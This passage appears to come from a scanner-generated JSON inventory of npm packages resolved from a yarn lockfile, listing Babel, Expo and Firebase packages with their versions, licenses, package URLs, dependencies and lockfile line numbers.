"pkg:npm/%40babel/plugin-syntax-async-generators@7.8.4", "UID": "a44dc67c9bb51313" }, "Version": "7.8.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 286, "EndLine": 291 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-bigint@7.8.3", "Name": "@babel/plugin-syntax-bigint", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-bigint@7.8.3", "UID": "612a0c694d95f97d" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 293, "EndLine": 298 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-class-properties@7.12.13", "Name": "@babel/plugin-syntax-class-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-class-properties@7.12.13", "UID": "651f7c14ec5fde1e" }, "Version": "7.12.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 300, "EndLine": 305 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-class-static-block@7.14.5", "Name": "@babel/plugin-syntax-class-static-block", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-class-static-block@7.14.5", "UID": "3dbc0cd2453625cc" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 307, "EndLine": 312 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-import-attributes@7.27.1", "Name": "@babel/plugin-syntax-import-attributes", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-import-attributes@7.27.1", "UID": "626218efb679b5e3" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 342, "EndLine": 347 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-import-meta@7.10.4", "Name": "@babel/plugin-syntax-import-meta", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-import-meta@7.10.4", "UID": "feaad14e3d91d7cc" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 349, "EndLine": 354 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-json-strings@7.8.3", "Name": "@babel/plugin-syntax-json-strings", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-json-strings@7.8.3", "UID": "159e13edba643384" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 356, "EndLine": 361 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-jsx@7.27.1", "Name": "@babel/plugin-syntax-jsx", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-jsx@7.27.1", "UID": "671a8e42d6ef3eaa" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 363, "EndLine": 368 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-logical-assignment-operators@7.10.4", "Name": "@babel/plugin-syntax-logical-assignment-operators", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-logical-assignment-operators@7.10.4", "UID": "41fb21ac22f11738" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 370, "EndLine": 375 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "Name": "@babel/plugin-syntax-nullish-coalescing-operator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "UID": "8809eba0461fa32d" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 377, "EndLine": 382 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-numeric-separator@7.10.4", "Name": "@babel/plugin-syntax-numeric-separator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-numeric-separator@7.10.4", "UID": "75732f6866e1556c" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 384, "EndLine": 389 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-object-rest-spread@7.8.3", "Name": "@babel/plugin-syntax-object-rest-spread", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-object-rest-spread@7.8.3", "UID": "ccd870846444c254" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 391, "EndLine": 396 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-optional-catch-binding@7.8.3", "Name": "@babel/plugin-syntax-optional-catch-binding", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-optional-catch-binding@7.8.3", "UID": "350e02b47b92f360" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 398, "EndLine": 403 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-optional-chaining@7.8.3", "Name": "@babel/plugin-syntax-optional-chaining", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-optional-chaining@7.8.3", "UID": "f39f2de4e96fab92" }, "Version": "7.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 405, "EndLine": 410 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-private-property-in-object@7.14.5", "Name": "@babel/plugin-syntax-private-property-in-object", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-private-property-in-object@7.14.5", "UID": "5bc976a3e34bc0b1" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 412, "EndLine": 417 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-top-level-await@7.14.5", "Name": "@babel/plugin-syntax-top-level-await", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-top-level-await@7.14.5", "UID": "93092bffdb9ddb6d" }, "Version": "7.14.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 419, "EndLine": 424 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-typescript@7.27.1", "Name": "@babel/plugin-syntax-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-syntax-typescript@7.27.1", "UID": "7810517fa4389044" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 426, "EndLine": 431 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-arrow-functions@7.27.1", "Name": "@babel/plugin-transform-arrow-functions", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-arrow-functions@7.27.1", "UID": "9742a2784a5dbf23" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 441, "EndLine": 446 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-class-properties@7.27.1", "Name": "@babel/plugin-transform-class-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-class-properties@7.27.1", "UID": "30ef223986dbfa1e" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 480, "EndLine": 486 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-classes@7.28.4", "Name": "@babel/plugin-transform-classes", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-classes@7.28.4", "UID": "ae5b9f691ec69ebf" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-globals@7.28.0", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-replace-supers@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 496, "EndLine": 506 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-modules-commonjs@7.27.1", "Name": "@babel/plugin-transform-modules-commonjs", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-modules-commonjs@7.27.1", "UID": "1db01d81e6fe5aec" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-module-transforms@7.28.3", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 637, "EndLine": 643 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", "Name": "@babel/plugin-transform-nullish-coalescing-operator", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-nullish-coalescing-operator@7.27.1", "UID": "25a7ee017fa32064" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 678, "EndLine": 683 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-optional-chaining@7.27.1", "Name": "@babel/plugin-transform-optional-chaining", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-optional-chaining@7.27.1", "UID": "40776f77e33002b9" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1" ], "Locations": [ { "StartLine": 718, "EndLine": 724 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-shorthand-properties@7.27.1", "Name": "@babel/plugin-transform-shorthand-properties", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-shorthand-properties@7.27.1", "UID": "bd0498bb1ad13919" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 823, "EndLine": 828 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-template-literals@7.27.1", "Name": "@babel/plugin-transform-template-literals", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-template-literals@7.27.1", "UID": "6c7797cbe8a2ef74" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 845, "EndLine": 850 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-typescript@7.28.0", "Name": "@babel/plugin-transform-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-typescript@7.28.0", "UID": "c794f5e30d11e4ce" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-create-class-features-plugin@7.28.3", "@babel/helper-plugin-utils@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "@babel/plugin-syntax-typescript@7.27.1" ], "Locations": [ { "StartLine": 859, "EndLine": 868 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-transform-unicode-regex@7.27.1", "Name": "@babel/plugin-transform-unicode-regex", "Identifier": { "PURL": "pkg:npm/%40babel/plugin-transform-unicode-regex@7.27.1", "UID": "7bfae57cd415f58" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-create-regexp-features-plugin@7.27.1", "@babel/helper-plugin-utils@7.27.1" ], "Locations": [ { "StartLine": 885, "EndLine": 891 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/preset-typescript@7.27.1", "Name": "@babel/preset-typescript", "Identifier": { "PURL": "pkg:npm/%40babel/preset-typescript@7.27.1", "UID": "6c61a48ef7276c1c" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1", "@babel/helper-validator-option@7.27.1", "@babel/plugin-syntax-jsx@7.27.1", "@babel/plugin-transform-modules-commonjs@7.27.1", "@babel/plugin-transform-typescript@7.28.0" ], "Locations": [ { "StartLine": 986, "EndLine": 995 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/runtime@7.28.4", "Name": "@babel/runtime", "Identifier": { "PURL": "pkg:npm/%40babel/runtime@7.28.4", "UID": "76a4949203cb3496" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 997, "EndLine": 1000 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/template@7.27.2", "Name": "@babel/template", "Identifier": { "PURL": "pkg:npm/%40babel/template@7.27.2", "UID": "346287b835286992" }, "Version": "7.27.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/parser@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 1002, "EndLine": 1009 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/traverse@7.28.4", "Name": "@babel/traverse", "Identifier": { "PURL": "pkg:npm/%40babel/traverse@7.28.4", "UID": "6c655f979214e216" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/generator@7.28.3", "@babel/helper-globals@7.28.0", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/types@7.28.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 1024, "EndLine": 1035 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/traverse--for-generate-function-map@7.28.4", "Name": "@babel/traverse--for-generate-function-map", "Identifier": { "PURL": "pkg:npm/%40babel/traverse--for-generate-function-map@7.28.4", "UID": "f1203ced1fb0401b" }, "Version": "7.28.4", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/generator@7.28.3", "@babel/helper-globals@7.28.0", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/types@7.28.4", "debug@4.4.3" ], "Locations": [ { "StartLine": 1011, "EndLine": 1022 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/types@7.28.4", "Name": "@babel/types", "Identifier": { "PURL": "pkg:npm/%40babel/types@7.28.4", "UID": "85d77357e93ad007" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-string-parser@7.27.1", "@babel/helper-validator-identifier@7.27.1" ], "Locations": [ { "StartLine": 1037, "EndLine": 1043 } ], "AnalyzedBy": "yarn" }, { "ID": "@callstack/react-theme-provider@3.0.9", "Name": "@callstack/react-theme-provider", "Identifier": { "PURL": "pkg:npm/%40callstack/react-theme-provider@3.0.9", "UID": "70b306d48db360cf" }, "Version": "3.0.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "deepmerge@3.3.0", "hoist-non-react-statics@3.3.2" ], "Locations": [ { "StartLine": 1050, "EndLine": 1056 } ], "AnalyzedBy": "yarn" }, { "ID": "@craftzdog/react-native-buffer@6.1.1", "Name": "@craftzdog/react-native-buffer", "Identifier": { "PURL": "pkg:npm/%40craftzdog/react-native-buffer@6.1.1", "UID": "d415388ff4e5689f" }, "Version": "6.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ieee754@1.2.1", "react-native-quick-base64@2.2.2" ], "Locations": [ { "StartLine": 1058, "EndLine": 1064 } ], "AnalyzedBy": "yarn" }, { "ID": "@egjs/hammerjs@2.0.17", "Name": "@egjs/hammerjs", "Identifier": { "PURL": "pkg:npm/%40egjs/hammerjs@2.0.17", "UID": "6a1c7a1eea925d4b" }, "Version": "2.0.17", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/hammerjs@2.0.46" ], "Locations": [ { "StartLine": 1071, "EndLine": 1076 } ], "AnalyzedBy": "yarn" }, { "ID": "@expo/config-plugins@10.1.2", "Name": "@expo/config-plugins", "Identifier": { "PURL": "pkg:npm/%40expo/config-plugins@10.1.2", "UID": "295d7e0935a3e548" }, "Version": "10.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@expo/config-types@53.0.5", "@expo/json-file@9.1.5", "@expo/plist@0.3.5", "@expo/sdk-runtime-versions@1.0.0", "chalk@4.1.2", "debug@4.4.3", "getenv@2.0.0", "glob@10.4.5", "resolve-from@5.0.0", "semver@7.7.3", "slash@3.0.0", "slugify@1.6.6", "xcode@3.0.1", "xml2js@0.6.0" ], "Locations": [ { "StartLine": 1110, "EndLine": 1128 } ], "AnalyzedBy": "yarn" }, { "ID": "@expo/config-types@53.0.5", "Name": "@expo/config-types", "Identifier": { "PURL": "pkg:npm/%40expo/config-types@53.0.5", "UID": "b185a9183eaa4a70" }, "Version": "53.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1130, "EndLine": 1133 } ], "AnalyzedBy": "yarn" }, { "ID": "@expo/json-file@9.1.5", "Name": "@expo/json-file", "Identifier": { "PURL": "pkg:npm/%40expo/json-file@9.1.5", "UID": "19c52f405a254277" }, "Version": "9.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.10.4", "json5@2.2.3" ], "Locations": [ { "StartLine": 1135, "EndLine": 1141 } ], "AnalyzedBy": "yarn" }, { "ID": "@expo/plist@0.3.5", "Name": "@expo/plist", "Identifier": { "PURL": "pkg:npm/%40expo/plist@0.3.5", "UID": "2cac886fbe944107" }, "Version": "0.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@xmldom/xmldom@0.8.11", "base64-js@1.5.1", "xmlbuilder@15.1.1" ], "Locations": [ { "StartLine": 1143, "EndLine": 1150 } ], "AnalyzedBy": "yarn" }, { "ID": "@expo/sdk-runtime-versions@1.0.0", "Name": "@expo/sdk-runtime-versions", "Identifier": { "PURL": "pkg:npm/%40expo/sdk-runtime-versions@1.0.0", "UID": "eb9af91b6ee10c8d" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1152, "EndLine": 1155 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/ai@2.2.1", "Name": "@firebase/ai", "Identifier": { "PURL": "pkg:npm/%40firebase/ai@2.2.1", "UID": "fd60398706c402c2" }, "Version": "2.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1157, "EndLine": 1166 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/analytics@0.10.18", "Name": "@firebase/analytics", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics@0.10.18", "UID": "9f0d3e3e756577f3" }, "Version": "0.10.18", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1184, "EndLine": 1193 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/analytics-compat@0.2.24", "Name": "@firebase/analytics-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics-compat@0.2.24", "UID": "5c7779bc7e3acd9e" }, "Version": "0.2.24", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/analytics@0.10.18", "@firebase/analytics-types@0.8.3", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1168, "EndLine": 1177 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/analytics-types@0.8.3", "Name": "@firebase/analytics-types", "Identifier": { "PURL": "pkg:npm/%40firebase/analytics-types@0.8.3", "UID": "a24b559ce60a70ac" }, "Version": "0.8.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1179, "EndLine": 1182 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app@0.14.2", "Name": "@firebase/app", "Identifier": { "PURL": "pkg:npm/%40firebase/app@0.14.2", "UID": "98b14aeeb5ad7a97" }, "Version": "0.14.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "idb@7.1.1", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1243, "EndLine": 1252 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-check@0.11.0", "Name": "@firebase/app-check", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check@0.11.0", "UID": "75949b0846bc3850" }, "Version": "0.11.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1217, "EndLine": 1225 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-check-compat@0.4.0", "Name": "@firebase/app-check-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-compat@0.4.0", "UID": "5380ee0646d181e2" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check@0.11.0", "@firebase/app-check-types@0.5.3", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1195, "EndLine": 1205 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-check-interop-types@0.3.3", "Name": "@firebase/app-check-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.3", "UID": "7f686dc723a6b7af" }, "Version": "0.3.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1207, "EndLine": 1210 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-check-types@0.5.3", "Name": "@firebase/app-check-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-types@0.5.3", "UID": "532cfa584977653a" }, "Version": "0.5.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1212, "EndLine": 1215 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-compat@0.5.2", "Name": "@firebase/app-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/app-compat@0.5.2", "UID": "bf6dd59673c3fb55" }, "Version": "0.5.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1227, "EndLine": 1236 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/app-types@0.9.3", "Name": "@firebase/app-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-types@0.9.3", "UID": "2ffc8e14cca6d9be" }, "Version": "0.9.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1238, "EndLine": 1241 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/auth@1.11.0", "Name": "@firebase/auth", "Identifier": { "PURL": "pkg:npm/%40firebase/auth@1.11.0", "UID": "896af45d09d22eb6" }, "Version": "1.11.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1275, "EndLine": 1283 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/auth-compat@0.6.0", "Name": "@firebase/auth-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-compat@0.6.0", "UID": "3370adced3f51da7" }, "Version": "0.6.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/auth@1.11.0", "@firebase/auth-types@0.13.0", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1254, "EndLine": 1263 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/auth-interop-types@0.2.4", "Name": "@firebase/auth-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.4", "UID": "ff590ff175fbf99e" }, "Version": "0.2.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1265, "EndLine": 1268 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/auth-types@0.13.0", "Name": "@firebase/auth-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-types@0.13.0", "UID": "96d3ff6a13c0a6c4" }, "Version": "0.13.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1270, "EndLine": 1273 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/component@0.7.0", "Name": "@firebase/component", "Identifier": { "PURL": "pkg:npm/%40firebase/component@0.7.0", "UID": "37c7747956771ec6" }, "Version": "0.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1285, "EndLine": 1291 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/data-connect@0.3.11", "Name": "@firebase/data-connect", "Identifier": { "PURL": "pkg:npm/%40firebase/data-connect@0.3.11", "UID": "d79150c2fbfd7c6b" }, "Version": "0.3.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1293, "EndLine": 1302 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/database@1.1.0", "Name": "@firebase/database", "Identifier": { "PURL": "pkg:npm/%40firebase/database@1.1.0", "UID": "4f4b10db63495689" }, "Version": "1.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.3", "@firebase/auth-interop-types@0.2.4", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "faye-websocket@0.11.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1324, "EndLine": 1335 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/database-compat@2.1.0", "Name": "@firebase/database-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/database-compat@2.1.0", "UID": "344f2a1f0fb607e2" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.7.0", "@firebase/database@1.1.0", "@firebase/database-types@1.0.16", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 1304, "EndLine": 1314 } ], "AnalyzedBy": "yarn" }, { "ID": "@firebase/database-types@1.0.16", "Name": "@firebase/database-types", "Identifier": { "PURL": "pkg:npm/%40firebase/database-types@1.0.16", "UID": "b1df3254f2392935" }, "Version": "1.0.16", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 1316, "EndLine": 1322 } ], 